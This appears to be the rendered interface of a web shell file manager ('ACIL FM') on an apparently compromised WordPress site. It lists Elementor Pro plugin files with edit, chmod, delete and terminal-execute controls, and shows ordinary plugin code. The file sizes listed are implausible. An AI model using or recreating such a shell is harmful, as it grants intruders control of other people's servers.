ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/elementor-pro/modules/theme-builder/documents
/
home
mhhtmff
www
site
wp-content
plugins
elementor-pro
modules
theme-builder
documents
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
archive-single-base.php
1.47 MB
chmod
View
DL
Edit
Rename
Delete
archive.php
3.27 MB
chmod
View
DL
Edit
Rename
Delete
error-404.php
1.55 MB
chmod
View
DL
Edit
Rename
Delete
footer.php
1.24 MB
chmod
View
DL
Edit
Rename
Delete
header-footer-base.php
1.01 MB
chmod
View
DL
Edit
Rename
Delete
header.php
1.29 MB
chmod
View
DL
Edit
Rename
Delete
search-results.php
1.77 MB
chmod
View
DL
Edit
Rename
Delete
section.php
2.51 MB
chmod
View
DL
Edit
Rename
Delete
single-base.php
4.98 MB
chmod
View
DL
Edit
Rename
Delete
single-page.php
1.34 MB
chmod
View
DL
Edit
Rename
Delete
single-post.php
1.29 MB
chmod
View
DL
Edit
Rename
Delete
single.php
1.02 MB
chmod
View
DL
Edit
Rename
Delete
theme-document.php
17.23 MB
chmod
View
DL
Edit
Rename
Delete
theme-page-document.php
3.52 MB
chmod
View
DL
Edit
Rename
Delete
theme-section-document.php
872 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/elementor-pro/modules/theme-builder/documents/single.php
<?php namespace ElementorPro\Modules\ThemeBuilder\Documents; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } class Single extends Single_Base { public static function get_type() { return 'single'; } public static function get_title() { return esc_html__( 'Single', 'elementor-pro' ); } public static function get_plural_title() { return esc_html__( 'Singles', 'elementor-pro' ); } protected function get_remote_library_config() { $config = parent::get_remote_library_config(); // Fallback for old multipurpose `single` documents. $category = $this->get_meta( self::REMOTE_CATEGORY_META_KEY ); if ( $category ) { if ( 'not_found404' === $category ) { $category = '404 page'; } else { $category = 'single ' . $category; } $config['category'] = $category; } else { $config['category'] = 'single post'; } return $config; } protected static function get_site_editor_thumbnail_url() { return ELEMENTOR_ASSETS_URL . 'images/app/site-editor/single-post.svg'; } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply